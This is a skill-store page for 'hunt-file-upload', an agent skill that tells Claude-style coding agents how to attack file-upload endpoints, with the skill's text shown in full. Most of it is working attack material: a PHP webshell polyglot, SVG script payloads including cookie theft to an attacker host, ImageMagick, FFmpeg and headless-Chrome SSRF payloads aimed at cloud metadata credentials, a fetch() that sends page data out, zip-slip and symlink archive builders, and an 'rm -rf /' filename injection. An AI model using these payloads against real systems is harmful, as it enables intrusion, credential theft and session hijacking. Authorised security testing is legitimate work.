‹ 首页

hunt-file-upload

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

Hunt file upload bugs — RCE via webshell, XSS via SVG/HTML, SSRF via XXE in DOCX, path traversal via filename. Bypass tables (10 techniques): double extension (shell.php.jpg if server checks last ext only), magic bytes spoofing (PNG header on PHP), null byte (shell.php.jpg), case (PHP, .Php, .pHP), .htaccess upload to enable execution, SVG with <script>, HTML/SVG XSS, DOCX with embedded XXE, ZIP slip (../../../etc/passwd in archive), polyglot files. Detection: any /upload, /avatar, /profile-picture, /attachment, /import endpoint. Test: upload PHP/JSP/ASPX shells, request via direct URL, check response. Validate: actual code execution (whoami output) for RCE; reflected XSS in profile-photo URL. Use when testing file upload features, avatar/attachment endpoints, import/export functions, XML/DOCX/ZIP processors. Real paid examples.

适合你,如果正在做Web应用安全测试,需要验证文件上传功能是否存在漏洞。

/ 下载安装
hunt-file-upload.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/hunt-file-upload
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-file-upload
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/hunt-file-upload
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~1.8K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

装上后,Claude 会帮你测试文件上传功能的安全性,尝试绕过限制上传恶意文件(如 PHP webshell、带 XSS 的 SVG、带 XXE 的 DOCX),并验证是否成功执行代码或触发漏洞。

什么时候触发

当你测试文件上传功能(如头像、附件、导入端点)或处理 XML/DOCX/ZIP 文件的场景时触发。

装好后可以这样说
Claude 会尝试上传 PHP 文件并验证是否可执行。
Claude 会上传含脚本的 SVG 并检查是否执行。
Claude 会构造含路径遍历的 ZIP 文件并测试。
技能原文 SKILL.md作者撰写 · MIT · 05098fc
9. FILE UPLOAD
Content-Type Bypass
filename=shell.php, Content-Type: image/jpeg  → server trusts Content-Type
filename=shell.phtml, shell.pHp, shell.php5   → extension variants
File Upload Bypass Techniques (10 techniques)

| Attack | How | Prevention | |---|---|---| | Extension bypass | shell.php.jpg, shell.pHp, shell.php5 | Allowlist + extract final extension | | Null byte | shell.php%00.jpg | Sanitize null bytes | | Double extension | shell.jpg.php | Only allow single extension | | MIME spoof | Content-Type: image/jpeg with .php body | Validate magic bytes, not MIME header | | Magic bytes prefix | Prepend GIF89a; to PHP code | Parse whole file, not just header | | Polyglot | Valid as JPEG and PHP | Process as image lib, reject if invalid | | SVG JavaScript | <svg onload="..."> | Sanitize SVG or disallow entirely | | XXE in DOCX | Malicious XML in Office ZIP | Disable external entities | | ZIP slip | ../../../etc/passwd in archive | Validate extracted paths | | Filename injection | ; rm -rf / in filename | Sanitize + use UUID names |

Magic Bytes Reference

| Type | Hex | |---|---| | JPEG | FF D8 FF | | PNG | 89 50 4E 47 0D 0A 1A 0A | | GIF | 47 49 46 38 | | PDF | 25 50 44 46 | | ZIP/DOCX/XLSX | 50 4B 03 04 |

Stored XSS via SVG
<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.domain)</script>
</svg>

ImageMagick / FFmpeg Exploitation
ImageMagick SSRF / File Read (ImageTragick family + modern variants)
# Upload this as a .mvg or rename to .jpg/.png (magic bytes bypass)
# MVG SSRF payload — fetches internal URL during processing
cat > /tmp/ssrf.mvg << 'EOF'
push graphic-context
viewbox 0 0 640 480
fill 'url(http://169.254.169.254/latest/meta-data/iam/security-credentials/)'
pop graphic-context
EOF

# SVG SSRF (ImageMagick processes SVG remotely)
cat > /tmp/ssrf.svg << 'EOF'
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="http://COLLAB_HOST/imagemagick-ssrf" width="200" height="200"/>
</svg>
EOF

# WebP/AVIF processing bugs (modern surface — CVE-2023-4863)
# Upload a crafted WebP file targeting libwebp heap overflow
# Use: https://github.com/mistymntncop/CVE-2023-4863 PoC
FFmpeg SSRF via HLS Playlist
# FFmpeg processes m3u8 playlists and fetches referenced segments
cat > /tmp/ssrf.m3u8 << 'EOF'
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://169.254.169.254/latest/meta-data/iam/security-credentials/
#EXT-X-ENDLIST
EOF

# Also works with concat demuxer
cat > /tmp/concat.txt << 'EOF'
ffconcat version 1.0
file 'http://COLLAB_HOST/ffmpeg-ssrf'
EOF

# Test: upload .m3u8 or video file to any video processing endpoint

Headless Chrome / PDF Generator SSRF
HTML → PDF Converter Attacks
# Target: invoice generators, report exporters, screenshot services
# Inject HTML that causes headless Chrome to fetch internal resources

# SSRF via CSS import
PAYLOAD='<html><head><style>@import url("http://169.254.169.254/latest/meta-data/");</style></head><body>test</body></html>'

# SSRF via HTML iframe
PAYLOAD='<html><body><iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" width="1000" height="1000"></iframe></body></html>'

# Local file read
PAYLOAD='<html><body><iframe src="file:///etc/passwd" width="1000" height="1000"></iframe></body></html>'

# JavaScript execution (if sandbox not enforced)
PAYLOAD='<html><body><script>
fetch("http://COLLAB_HOST/chrome-rce?d=" + encodeURIComponent(document.documentElement.innerHTML));
</script></body></html>'

# Test: submit HTML to any /generate-pdf, /export, /screenshot, /report endpoint
curl -s -X POST "https://$TARGET/api/generate-pdf" \
  -H "Content-Type: application/json" \
  -d "{\"html\": \"$PAYLOAD\"}"

Archive Extraction Attacks (Zip Slip / Symlink)
# Zip Slip — path traversal via archive filenames
pip3 install evilarc
python3 evilarc.py shell.php -o unix -p "../../../var/www/html/" -d 5 -f /tmp/zipslip.zip

# Symlink attack — archive contains symlink to sensitive file
mkdir -p /tmp/sym_attack
ln -s /etc/passwd /tmp/sym_attack/innocent.txt
zip -ry /tmp/symlink.zip /tmp/sym_attack/

# TAR symlink attack
tar --create --file=/tmp/symlink.tar --dereference /tmp/sym_attack/

# Test: upload to any /import, /extract, /unzip endpoint
curl -s -X POST "https://$TARGET/api/import" \
  -F "file=@/tmp/zipslip.zip"

Related Skills & Chains
  • hunt-rce — File upload is the most common path to RCE on classic PHP/JSP/ASPX stacks once you find a directly-served upload directory or a deserializer-fed processor. Chain primitive: polyglot GIF89a;<?php system($_GET['c']);?> bypasses magic-byte check + .phtml extension bypasses allowlist → GET /uploads/shell.phtml?c=id → RCE; or PHP phar:// upload to a sink calling file_exists() on the attacker-controlled path → PHP object deserialization → RCE.
  • hunt-xxe — Office formats (DOCX/XLSX/PPTX), SVGs, and SOAP attachments are XML inside a ZIP — every upload-and-parse feature is a latent XXE candidate. Chain primitive: upload DOCX whose [Content_Types].xml or word/document.xml includes a parameter-entity DTD pointing at attacker-controlled DTD → blind XXE OOB file read → exfil /etc/passwd or web.config via the document parser.
  • hunt-xss — SVGs, HTML files, and PDFs uploaded then served on the same origin are stored-XSS factories. Chain primitive: upload SVG with <script>fetch('//attacker/?'+document.cookie)</script> → victim views attachment at app.target.com/uploads/x.svg (same origin, not sandboxed) → cookie theft → ATO via session hijack.
  • hunt-ssrf — Image-processing libraries (ImageMagick, ffmpeg) fetch remote URLs from inside the uploaded file. Chain primitive: upload an SVG/MVG with <image xlink:href="http://169.254.169.254/latest/meta-data/iam/security-credentials/"> or ffmpeg concat:http://internal/... → SSRF to AWS IMDS → cloud creds; the ImageTragick CVE-2016-3714 family is still alive on legacy farms.
  • security-arsenal — Reach for the file-upload bypass tree: 10-row extension/MIME/magic-byte bypass table (double-ext, null-byte, case variants, .phtml/.phar/.php5/.pht, .htaccess upload to re-enable handlers, web.config upload on IIS), SVG/MVG/SVGZ payloads, DOCX-XXE templates, ZIP-slip path traversal in archives, polyglot generators.
  • triage-validation — Apply the Reproducibility Gate. A file successfully uploaded but never served, never executed, never parsed by anything is not a finding — it's a write-only blob. Critical RCE requires the actual whoami round-trip from the uploaded shell; stored XSS requires the popup firing in a victim browser, not just the file existing on disk.
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。